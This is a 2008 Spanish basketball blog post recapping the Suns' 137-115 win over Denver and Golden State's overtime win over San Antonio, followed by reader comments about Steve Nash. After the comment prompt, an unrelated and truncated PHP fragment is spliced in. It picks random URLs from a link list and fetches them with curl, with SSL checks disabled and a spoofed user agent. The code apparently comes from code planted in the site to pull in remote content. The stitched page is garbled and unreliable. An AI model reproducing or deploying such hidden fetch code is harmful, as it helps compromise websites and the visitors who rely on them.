La crónica (07/01/08)

08 de January de 2008 por txusma

Tan solo 2 partidos hoy en la NBA, pero vaya 2 partidos. Phoenix le ha ganado a Denver anotando 137 puntos sin prórroga, un tanteo de otros tiempos, liderado por un Shawn Marion que se fue a los 27 puntos y 14 rebotes. Otros tres jugadores de los Suns han anotado 20 o más puntos, lo que da una idea del partido tremendamente ofensivo que ha jugado la franquicia de Arizona. Enfrente había unos Nuggets que tampoco se han quedado atrás con 115 puntos, con un Allen Iverson que en los últimos partidos está volviendo a ser la principal referencia ofensiva de su equipo y que esta noche ha anotado 32. A su lado, como siempre, Carmelo Anthony, con 20 puntos y 14 rebotes. Los Suns basaron su victoria en un impresionante acierto en el tiro exterior: nada menos que 20 triples con un 65% de acierto.

Pero el otro partido del día no ha deslucido al anterior, ni mucho menos: San Antonio 121 – Golden State 131. Los Warriors necesitaron una prórroga y una actuación estelar de Stephen Jackson en ella para llevarse el partido ante los actuales campeones. Jackson anotó 12 puntos en el tiempo extra acabando con un total de 29. Pero el hombre más valioso de la franquicia de Oakland fue Baron Davis que lideró a su equipo con 34 puntos, 14 asistencias y 6 rebotes. Además de ellos , destacaron también hombres como Monta Ellis y Kelenna Azubiuke, ambos con 16 puntos, aunque el escolta de la Universidad de Kentucky los logró con un inmaculado 7 de 7 en tiros. Enfrente Tony Parker, que encestó el triple que forzó la prórroga a falta de 6 segundos para final, y Tim Duncan con más de 30 puntos cada uno y un Manu Ginóbili que sigue produciendo desde su rol de sexto hombre, postulándose como principal candidato a este galardón a final de temporada.

El MVP de la noche: Galardón para Baron Davis que, aparte de su sensacional estadística, realizó un extraordinario partido, hizo jugar a sus compañeros y creó multitud de buenas jugadas de ataque sin perder un solo balón.

 

El rookie de la noche: Mala noche para los novatos. Tan sólo jugó Alando Tucker, que no anotó ni un punto.

 

La sorpresa de la noche: Kelenna Azubuike y su inmaculado 7 de 7 en tiros. A eso se le llama aprovechar el tiempo de juego. También nos ha sorprendido el impresionante 7 de 8 en triples de Marcus Banks en el festival de los Suns.

 

La decepción de la noche: Cuando hemos visto que los Suns habían anotado 137 puntos el primer pensamiento ha sido: “Seguramente Steve Nash se ha salido literalmente repartiendo multitud de asistencias”. Pero no ha sido así y Nash ha acabado con unos tristes (para él) 13 puntos y 10 pases de canasta.

Y las 10 mejores jugadas de la noche son…

 

Comenta

4 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Joer como os habeis pasado con la decepcion de la noche, joer k no es tan facil dar 10 asistencias, ademas ha hecho 19 de EFF.

    Yo la decepcion se la daria a boris diaw.

      Citar

  2. MagicJohnson32 dice:
    #2

    Yo se la había dado a Diaw, pero en realidad hizo sus números habituales. De hecho, decía que la sección del jugador más decepcionante podría llevar su nombre xD

      Citar

  3. txusma dice:
    #3

    Si o no, es una decepcion q en un partido a 137 puntos Nash solo haya repartido 10 asistencias?

      Citar

  4. xapa_croack dice:
    #4

    Bueno txus, las asistencias tambien dependen de los compañeros como esten de enfuchados, ademas vi el ultimo cuarto, y me destacaron negativamente muchos mas jugadores de colorado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>